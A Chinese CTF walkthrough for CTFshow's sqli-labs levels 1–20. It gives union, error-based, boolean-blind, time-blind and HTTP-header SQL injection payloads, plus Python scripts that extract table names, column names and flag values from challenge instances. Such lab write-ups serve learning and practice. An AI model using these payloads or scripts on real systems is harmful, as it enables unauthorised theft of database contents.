
sqlilab(1-20)

前言

  • 题目是CTFshow-web入门中的sqlilab分栏
  • 题目有在原靶场基础上加入flag
  • flag不在当前数据库中,利用 `-1' union select 1,2,(select group_concat(schema_name) from information_schema.schemata)-- qwe` 列出全部库名,可以看到名为ctfshow的数据库,flag就在这里面。注释写成 `-- qwe` 而不是单独的 `--`,是因为MySQL要求 `--` 后面必须跟至少一个空白字符,末尾补上任意字符可以防止尾部空格被截掉。

Less1

  • 字符型注入

直接放payload了

id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'-- qwe
id=-1'union select 1,flag,3 from ctfshow.flag -- qwe

Less2

  • 数字型注入
id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagaa'-- qwe
id=-1 union select 1,flagac,3 from ctfshow.flagaa#

Less3

  • 闭合方式
id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagaanec'-- qwe
id=-1')union select 1,flagaca,3 from ctfshow.flagaanec -- qwe

Less4

  • 闭合方式
id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'-- qwe
id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flagsf'-- qwe
id=-1")union select 1,flag23,3 from ctfshow.flagsf -- qwe

Less5

  • 报错注入
id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1)-- qwe
id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flagpuck')),1)-- qwe
id=-1' and updatexml(1,concat(0x7e,(select flag33 from ctfshow.flagpuck)),1)-- qwe
//报错回显最多只显示32个字符,所以一次只能出一部分,利用mid函数分段截取
id=-1' and updatexml(1,concat(0x7e,mid((select flag33 from ctfshow.flagpuck),20,30)),1)-- qwe

Less6

  • 闭合方式
id=-1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1)-- qwe
id=-1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flagpa')),1)-- qwe
id=-1" and updatexml(1,concat(0x7e,(select flag3a3 from ctfshow.flagpa)),1)-- qwe
id=-1" and updatexml(1,concat(0x7e,mid((select flag3a3 from ctfshow.flagpa),20,30)),1)-- qwe

Less7

  • 写文件+闭合方式

但我在这题一直写不进去(常见原因是 secure_file_priv 限制或数据库账号没有 FILE 权限,此处未验证),就干脆改用布尔盲注了

import requests

# Marker that appears in the response only when the injected condition is true.
true_result = "You are in.."
# Challenge instance; it must end in '?' so each payload becomes the query string.
url = "http://6075d260-f32b-422e-b037-5d2feeac24db.challenge.ctf.show/?"

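def table_name(url):
    """Recover the first table name in the `ctfshow` schema via boolean blind injection.

    url: challenge base URL ending in '?', so the payload becomes the query string.
    Side effects: one GET per candidate length (1..59), then one GET per
    (position, byte) until a byte matches; progress is printed. Returns None —
    the recovered name is only printed. Uses the module-level `true_result`
    marker, which must appear only in the "condition true" response.
    """
    subquery = ("select table_name from information_schema.tables "
                "where table_schema='ctfshow' limit 0,1")
    found = ''
    for length in range(1, 60):
        probe = f"id=1')) and length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        if true_result not in requests.get(url + probe, timeout=10).text:
            continue
        print("table length : " + str(length))
        for pos in range(1, length + 1):
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1')) and ascii(substr(({subquery}),{pos},1))={code}"
                         " -- qwe")
                if true_result in requests.get(url + probe, timeout=10).text:
                    found += chr(code)
                    break
            else:
                # Nothing matched (byte outside 33..126 or a flaky response):
                # keep a placeholder so later positions do not shift left.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")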

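def column_name(url):
    """Recover a column name of table `flagdk` via boolean blind injection.

    `limit 1,1` selects the second column of the table (offset 1), i.e. the one
    after whatever comes first. url: challenge base URL ending in '?'.
    Side effects: one GET per candidate length, then one GET per (position, byte)
    until a match; progress is printed. Returns None — the name is only printed.
    Uses the module-level `true_result` marker.
    """
    subquery = ("select column_name from information_schema.columns "
                "where table_name='flagdk' limit 1,1")
    found = ''
    for length in range(1, 60):
        probe = f"id=1')) and length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        if true_result not in requests.get(url + probe, timeout=10).text:
            continue
        print("column length : " + str(length))
        for pos in range(1, length + 1):
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1')) and ascii(substr(({subquery}),{pos},1))={code}"
                         " -- qwe")
                if true_result in requests.get(url + probe, timeout=10).text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")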


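def getflag(url):
    """Recover the value of `ctfshow.flagdk.flag43` via boolean blind injection.

    url: challenge base URL ending in '?'. Side effects: one GET per candidate
    length (1..59), then one GET per (position, byte) until a match; progress is
    printed. Returns None — the flag is only printed. Uses the module-level
    `true_result` marker.
    """
    subquery = "select flag43 from ctfshow.flagdk limit 0,1"
    found = ''
    for length in range(1, 60):
        probe = f"id=1')) and length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        if true_result not in requests.get(url + probe, timeout=10).text:
            continue
        print("flag length : " + str(length))
        for pos in range(1, length + 1):
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1')) and ascii(substr(({subquery}),{pos},1))={code}"
                         " -- qwe")
                if true_result in requests.get(url + probe, timeout=10).text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")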

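# Run one stage at a time: each later stage hard-codes the name recovered by the
# previous one (column_name() embeds the table name, getflag() embeds both).
# The guard keeps the exploit requests from firing if this file is imported.
if __name__ == "__main__":
    # table_name(url)
    # column_name(url)
    getflag(url)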

Less8

  • 布尔盲注

和上题一样,改改payload就行

import requests

# Marker that appears in the response only when the injected condition is true.
true_result = "You are in.........."
# Challenge instance; it must end in '?' so each payload becomes the query string.
url = "http://2d1c61ab-a019-4c49-a548-81d28728e1cc.challenge.ctf.show/?"

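def table_name(url):
    """Recover the first table name in the `ctfshow` schema via boolean blind injection.

    Single-quote closing variant (`id=1' and ...`). url: challenge base URL ending
    in '?'. Side effects: one GET per candidate length, then one GET per
    (position, byte) until a match; progress is printed. Returns None — the name
    is only printed. Uses the module-level `true_result` marker.
    """
    subquery = ("select table_name from information_schema.tables "
                "where table_schema='ctfshow' limit 0,1")
    found = ''
    for length in range(1, 60):
        probe = f"id=1' and length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        if true_result not in requests.get(url + probe, timeout=10).text:
            continue
        print("table length : " + str(length))
        for pos in range(1, length + 1):
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1' and ascii(substr(({subquery}),{pos},1))={code}"
                         " -- qwe")
                if true_result in requests.get(url + probe, timeout=10).text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")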

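def column_name(url):
    """Recover a column name of table `flagjugg` via boolean blind injection.

    `limit 1,1` selects the second column (offset 1). url: challenge base URL
    ending in '?'. Side effects: one GET per candidate length, then one GET per
    (position, byte) until a match; progress is printed. Returns None — the name
    is only printed. Uses the module-level `true_result` marker.
    """
    subquery = ("select column_name from information_schema.columns "
                "where table_name='flagjugg' limit 1,1")
    found = ''
    for length in range(1, 60):
        probe = f"id=1' and length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        if true_result not in requests.get(url + probe, timeout=10).text:
            continue
        print("column length : " + str(length))
        for pos in range(1, length + 1):
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1' and ascii(substr(({subquery}),{pos},1))={code}"
                         " -- qwe")
                if true_result in requests.get(url + probe, timeout=10).text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")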


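def getflag(url):
    """Recover the value of `ctfshow.flagjugg.flag423` via boolean blind injection.

    url: challenge base URL ending in '?'. Side effects: one GET per candidate
    length, then one GET per (position, byte) until a match; progress is printed.
    Returns None — the flag is only printed. Uses the module-level `true_result`
    marker.
    """
    subquery = "select flag423 from ctfshow.flagjugg limit 0,1"
    found = ''
    for length in range(1, 60):
        probe = f"id=1' and length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        if true_result not in requests.get(url + probe, timeout=10).text:
            continue
        print("flag length : " + str(length))
        for pos in range(1, length + 1):
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1' and ascii(substr(({subquery}),{pos},1))={code}"
                         " -- qwe")
                if true_result in requests.get(url + probe, timeout=10).text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")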

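# Run one stage at a time: each later stage hard-codes the name recovered by the
# previous one (column_name() embeds the table name, getflag() embeds both).
# The guard keeps the exploit requests from firing if this file is imported.
if __name__ == "__main__":
    # table_name(url)
    # column_name(url)
    getflag(url)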

Less9

  • 时间盲注

因为时间盲注受网络抖动影响本来就不稳定,跑一次结果不一定可靠,我跑了两次对照着才得出正确结果。要想更稳,可以把 sleep 时间适当拉长、每次命中后再发一次请求确认,或者用二分法比较 ascii 值以减少请求数。

ctfshow{24bee26a-d0ec-4082-a79e-aa9312669a-a} //第一次

ctfshow{24bee26a-d0ec-4082-a79e-a!9312669a1a} //第二次

ctfshow{24bee26a-d0ec-4082-a79e-aa9312669a1a} //最终正确的

import requests
import time

# Challenge instance; it must end in '?' so each payload becomes the query string.
url = "http://f51908c5-3032-4648-944b-410b0c6c7d99.challenge.ctf.show/?"

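def table_name(url):
    """Recover the first table name in the `ctfshow` schema via time-based blind injection.

    Each probe makes MySQL sleep(3) when the condition holds, so a slow round trip
    means "true". url: challenge base URL ending in '?'. Side effects: one GET
    per candidate length, then one GET per (position, byte) until a match;
    progress is printed. Returns None — the name is only printed.
    """
    delay = 3         # seconds the server sleeps on a true condition
    threshold = 2.5   # a round trip slower than this counts as "slept"
    # NOTE(review): assumes normal round trips stay well under the threshold;
    # measure baseline latency first on a slow or jittery link.
    subquery = ("select table_name from information_schema.tables "
                "where table_schema='ctfshow' limit 0,1")
    found = ''
    for length in range(1, 60):
        probe = f"id=1' and if(length(({subquery}))={length},sleep({delay}),1)-- qwe"
        started = time.monotonic()  # monotonic: not affected by wall-clock jumps
        requests.get(url + probe, timeout=delay + 10)
        if time.monotonic() - started <= threshold:
            continue
        print(length)
        for pos in range(1, length + 1):
            print("now in :" + str(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1' and if(ascii(mid(({subquery}),{pos},1))={code},"
                         f"sleep({delay}),1)-- qwe")
                started = time.monotonic()
                requests.get(url + probe, timeout=delay + 10)
                if time.monotonic() - started > threshold:
                    found += chr(code)
                    break
            else:
                # No byte triggered the delay (out of range, or a dropped sleep):
                # keep a placeholder so later positions do not shift left.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 triggered the delay; check the closing sequence")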

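def column_name(url):
    """Recover a column name of table `flagug` via time-based blind injection.

    `limit 1,1` selects the second column (offset 1). Each probe makes MySQL
    sleep(3) when the condition holds. url: challenge base URL ending in '?'.
    Side effects: one GET per candidate length, then one GET per (position, byte)
    until a match; progress is printed. Returns None — the name is only printed.
    """
    delay = 3         # seconds the server sleeps on a true condition
    threshold = 2.5   # a round trip slower than this counts as "slept"
    # NOTE(review): assumes normal round trips stay well under the threshold.
    subquery = ("select column_name from information_schema.columns "
                "where table_name='flagug' limit 1,1")
    found = ''
    for length in range(1, 60):
        probe = f"id=1' and if(length(({subquery}))={length},sleep({delay}),1)-- qwe"
        started = time.monotonic()  # monotonic: not affected by wall-clock jumps
        requests.get(url + probe, timeout=delay + 10)
        if time.monotonic() - started <= threshold:
            continue
        print(length)
        for pos in range(1, length + 1):
            print("now in :" + str(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1' and if(ascii(mid(({subquery}),{pos},1))={code},"
                         f"sleep({delay}),1)-- qwe")
                started = time.monotonic()
                requests.get(url + probe, timeout=delay + 10)
                if time.monotonic() - started > threshold:
                    found += chr(code)
                    break
            else:
                # No byte triggered the delay: keep a placeholder so positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 triggered the delay; check the closing sequence")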

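def getflag(url):
    """Recover `ctfshow.flagug.flag4a23` via time-based blind injection.

    Uses a longer sleep(5) than the schema stages to get a clearer signal. Byte
    extraction starts at position 8, skipping positions 1..7 (presumably the known
    `ctfshow` prefix — the printed value therefore omits it). url: challenge base
    URL ending in '?'. Side effects: one GET per candidate length, then one GET
    per (position, byte) until a match; progress is printed. Returns None.
    """
    delay = 5         # seconds the server sleeps on a true condition
    threshold = 4.9   # a round trip slower than this counts as "slept"
    # NOTE(review): assumes normal round trips stay well under the threshold.
    subquery = "select flag4a23 from ctfshow.flagug limit 0,1"
    found = ''
    for length in range(1, 60):
        probe = f"id=1' and if(length(({subquery}))={length},sleep({delay}),1)-- qwe"
        started = time.monotonic()  # monotonic: not affected by wall-clock jumps
        requests.get(url + probe, timeout=delay + 10)
        if time.monotonic() - started <= threshold:
            continue
        print(length)
        for pos in range(8, length + 1):
            print("now in :" + str(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f"id=1' and if(ascii(mid(({subquery}),{pos},1))={code},"
                         f"sleep({delay}),1)-- qwe")
                started = time.monotonic()
                requests.get(url + probe, timeout=delay + 10)
                if time.monotonic() - started > threshold:
                    found += chr(code)
                    break
            else:
                # No byte triggered the delay: keep a placeholder so positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 triggered the delay; check the closing sequence")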

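# Run one stage at a time: each later stage hard-codes the name recovered by the
# previous one (column_name() embeds the table name, getflag() embeds both).
# The guard keeps the exploit requests from firing if this file is imported.
if __name__ == "__main__":
    # table_name(url)
    # column_name(url)
    getflag(url)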

Less10

  • 闭合方式

换成双引号闭合即可

Less11

  • POST的联合注入
passwd=1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow'-- qwe&submit=Submit&uname=bilala

passwd=1'union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd'-- qwe&submit=Submit&uname=bilala

passwd=1'union select 1,flag43s from ctfshow.flagugsd -- qwe&submit=Submit&uname=bilala

Less12

  • 闭合方式

双引号加括号闭合,剩下同上

Less13

  • POST报错
passwd=1') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1)-- qwe&submit=Submit&uname=bilala

passwd=1') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)-- qwe&submit=Submit&uname=bilala

passwd=1') and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag)),1)-- qwe&submit=Submit&uname=bilala
passwd=1') and updatexml(1,concat(0x7e,mid((select flag4 from ctfshow.flag),20,40)),1)-- qwe&submit=Submit&uname=bilala

Less14

  • 闭合方式

同上,改为双引号闭合

Less15

  • POST布尔盲注
import requests

# Marker that appears in the response only when the login succeeds, i.e. the
# injected condition is true.
true_result = "flag.jpg"
# Challenge instance; payloads are sent as POST form fields, so no '?' here.
url = "http://6d80101a-1f11-4934-855b-3a4d59095bca.challenge.ctf.show/"

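def table_name(url):
    """Recover the first table name in the `ctfshow` schema via POST boolean blind injection.

    The payload goes into the `passwd` form field with a fixed `uname`; `1' or
    <cond>` makes the login succeed exactly when the condition holds. url: login
    endpoint. Side effects: one POST per candidate length, then one POST per
    (position, byte) until a match; progress is printed. Returns None — the name
    is only printed. Uses the module-level `true_result` marker.

    Fixes: the byte probe no longer carries a stray `id=` prefix, and both probes
    use the same `-- qwe` comment terminator.
    """
    subquery = ("select table_name from information_schema.tables "
                "where table_schema='ctfshow' limit 0,1")
    found = ''
    for length in range(1, 60):
        probe = f"1' or length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        response = requests.post(url, data={'uname': 'bilala', 'passwd': probe}, timeout=10)
        if true_result not in response.text:
            continue
        print("table length : " + str(length))
        for pos in range(1, length + 1):
            print('[*]now in {}'.format(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = f"1' or ascii(substr(({subquery}),{pos},1))={code} -- qwe"
                response = requests.post(url, data={'uname': 'bilala', 'passwd': probe},
                                         timeout=10)
                if true_result in response.text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")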

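def column_name(url):
    """Recover a column name of table `flagba` via POST boolean blind injection.

    `limit 1,1` selects the second column (offset 1). The payload goes into the
    `passwd` form field with a fixed `uname`. url: login endpoint. Side effects:
    one POST per candidate length, then one POST per (position, byte) until a
    match; progress is printed. Returns None — the name is only printed. Uses
    the module-level `true_result` marker.
    """
    subquery = ("select column_name from information_schema.columns "
                "where table_name='flagba' limit 1,1")
    found = ''
    for length in range(1, 60):
        probe = f"1' or length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        response = requests.post(url, data={'uname': 'bilala', 'passwd': probe}, timeout=10)
        if true_result not in response.text:
            continue
        print("column length : " + str(length))
        for pos in range(1, length + 1):
            print("[*]now in {}".format(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = f"1' or ascii(substr(({subquery}),{pos},1))={code} -- qwe"
                response = requests.post(url, data={'uname': 'bilala', 'passwd': probe},
                                         timeout=10)
                if true_result in response.text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")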


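def getflag(url):
    """Recover `ctfshow.flagba.flag4sa` via POST boolean blind injection.

    Byte extraction starts at position 8, skipping positions 1..7 (presumably the
    known `ctfshow` prefix — the printed value therefore omits it). The payload
    goes into the `passwd` form field with a fixed `uname`. url: login endpoint.
    Side effects: one POST per candidate length, then one POST per (position,
    byte) until a match; progress is printed. Returns None. Uses the module-level
    `true_result` marker.
    """
    subquery = "select flag4sa from ctfshow.flagba limit 0,1"
    found = ''
    for length in range(1, 60):
        probe = f"1' or length(({subquery}))={length} -- qwe"
        # timeout: a hung connection should fail loudly instead of stalling the loop
        response = requests.post(url, data={'uname': 'bilala', 'passwd': probe}, timeout=10)
        if true_result not in response.text:
            continue
        print("flag length : " + str(length))
        for pos in range(8, length + 1):
            print("[*]now in {}".format(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = f"1' or ascii(substr(({subquery}),{pos},1))={code} -- qwe"
                response = requests.post(url, data={'uname': 'bilala', 'passwd': probe},
                                         timeout=10)
                if true_result in response.text:
                    found += chr(code)
                    break
            else:
                # Nothing matched: keep a placeholder so later positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 matched; check the closing sequence and marker")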

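# Run one stage at a time: each later stage hard-codes the name recovered by the
# previous one (column_name() embeds the table name, getflag() embeds both).
# The guard keeps the exploit requests from firing if this file is imported.
if __name__ == "__main__":
    # table_name(url)
    # column_name(url)
    getflag(url)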

Less16

  • 时间盲注,")闭合
import requests
import time

# Challenge instance; payloads are sent as POST form fields, so no '?' here.
url = "http://49e62caa-a063-4a6e-8707-b86d5c958c9e.challenge.ctf.show/"

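def table_name(url):
    """Recover the first table name in the `ctfshow` schema via POST time-based blind injection.

    The payload goes into the `uname` form field with a fixed `passwd`, closing
    with `")`. Each probe makes MySQL sleep(3) when the condition holds, so a slow
    round trip means "true". url: login endpoint. Side effects: one POST per
    candidate length, then one POST per (position, byte) until a match; progress
    is printed. Returns None — the name is only printed.
    """
    delay = 3         # seconds the server sleeps on a true condition
    threshold = 2.5   # a round trip slower than this counts as "slept"
    # NOTE(review): assumes normal round trips stay well under the threshold;
    # measure baseline latency first on a slow or jittery link.
    subquery = ("select table_name from information_schema.tables "
                "where table_schema='ctfshow' limit 0,1")
    found = ''
    for length in range(1, 60):
        probe = f'admin") and if(length(({subquery}))={length},sleep({delay}),1)-- qwe'
        started = time.monotonic()  # monotonic: not affected by wall-clock jumps
        requests.post(url, data={'uname': probe, 'passwd': '1'}, timeout=delay + 10)
        if time.monotonic() - started <= threshold:
            continue
        print(length)
        for pos in range(1, length + 1):
            print("[*]now in :" + str(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f'admin") and if(ascii(mid(({subquery}),{pos},1))={code},'
                         f'sleep({delay}),1)-- qwe')
                started = time.monotonic()
                requests.post(url, data={'uname': probe, 'passwd': '1'}, timeout=delay + 10)
                if time.monotonic() - started > threshold:
                    found += chr(code)
                    break
            else:
                # No byte triggered the delay: keep a placeholder so positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 triggered the delay; check the closing sequence")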

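def column_name(url):
    """Recover a column name of table `flagbab` via POST time-based blind injection.

    `limit 1,1` selects the second column (offset 1). The payload goes into the
    `uname` form field with a fixed `passwd`, closing with `")`; each probe makes
    MySQL sleep(3) when the condition holds. url: login endpoint. Side effects:
    one POST per candidate length, then one POST per (position, byte) until a
    match; progress is printed. Returns None — the name is only printed.
    """
    delay = 3         # seconds the server sleeps on a true condition
    threshold = 2.5   # a round trip slower than this counts as "slept"
    # NOTE(review): assumes normal round trips stay well under the threshold.
    subquery = ("select column_name from information_schema.columns "
                "where table_name='flagbab' limit 1,1")
    found = ''
    for length in range(1, 60):
        probe = f'admin") and if(length(({subquery}))={length},sleep({delay}),1)-- qwe'
        started = time.monotonic()  # monotonic: not affected by wall-clock jumps
        requests.post(url, data={'uname': probe, 'passwd': '1'}, timeout=delay + 10)
        if time.monotonic() - started <= threshold:
            continue
        print(length)
        for pos in range(1, length + 1):
            print("now in :" + str(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f'admin") and if(ascii(mid(({subquery}),{pos},1))={code},'
                         f'sleep({delay}),1)-- qwe')
                started = time.monotonic()
                requests.post(url, data={'uname': probe, 'passwd': '1'}, timeout=delay + 10)
                if time.monotonic() - started > threshold:
                    found += chr(code)
                    break
            else:
                # No byte triggered the delay: keep a placeholder so positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 triggered the delay; check the closing sequence")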

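def getflag(url):
    """Recover `ctfshow.flagbab.flag4sa` via POST time-based blind injection.

    The length probe uses sleep(5) for a clearer signal; byte probes use sleep(3)
    to keep the run shorter. Byte extraction starts at position 8, skipping
    positions 1..7 (presumably the known `ctfshow` prefix — the printed value
    therefore omits it). The payload goes into the `uname` form field with a
    fixed `passwd`, closing with `")`. url: login endpoint. Side effects: one
    POST per candidate length, then one POST per (position, byte) until a match;
    progress is printed. Returns None.
    """
    length_delay, length_threshold = 5, 4.9   # sleep seconds / "slept" cut-off
    char_delay, char_threshold = 3, 2.9
    # NOTE(review): assumes normal round trips stay well under the thresholds.
    subquery = "select flag4sa from ctfshow.flagbab limit 0,1"
    found = ''
    for length in range(1, 60):
        probe = (f'admin") and if(length(({subquery}))={length},'
                 f'sleep({length_delay}),1)-- qwe')
        started = time.monotonic()  # monotonic: not affected by wall-clock jumps
        requests.post(url, data={'uname': probe, 'passwd': '1'}, timeout=length_delay + 10)
        if time.monotonic() - started <= length_threshold:
            continue
        print(length)
        for pos in range(8, length + 1):
            print("now in :" + str(pos))
            for code in range(33, 127):  # printable ASCII, space excluded
                probe = (f'admin") and if(ascii(mid(({subquery}),{pos},1))={code},'
                         f'sleep({char_delay}),1)-- qwe')
                started = time.monotonic()
                requests.post(url, data={'uname': probe, 'passwd': '1'},
                              timeout=char_delay + 10)
                if time.monotonic() - started > char_threshold:
                    found += chr(code)
                    break
            else:
                # No byte triggered the delay: keep a placeholder so positions do not shift.
                found += '?'
            print(found)
        break
    else:
        print("no length in 1..59 triggered the delay; check the closing sequence")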

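# Run one stage at a time: each later stage hard-codes the name recovered by the
# previous one (column_name() embeds the table name, getflag() embeds both).
# The guard keeps the exploit requests from firing if this file is imported.
if __name__ == "__main__":
    # table_name(url)
    # column_name(url)
    getflag(url)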

Less17

  • 报错注入

同less13,改闭合方式为'

Less18

  • HEAD注入(user-agent)

利用User-Agent进行报错注入,前提是要先登录成功(登录成功后UA才会被写入数据库)。同时结尾不能再用 `-- qwe` 注释掉后面的语句,而是用 `and '1'='1` 把剩余的单引号闭合掉。

ua: 'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow')),1) and '1'='1
ua: ' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag')),1)and '1'='1
ua: ' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag)),1)and '1'='1
ua: ' and updatexml(1,concat(0x7e,mid((select flag4 from ctfshow.flag),20,40)),1)and '1'='1

Less19

  • HEAD注入(referer)

同上,改referer字段即可

Less20

  • HEAD注入(cookie)

同上,改cookie字段为uname=payload

至于为什么要用uname为键名,那只能看看源码了
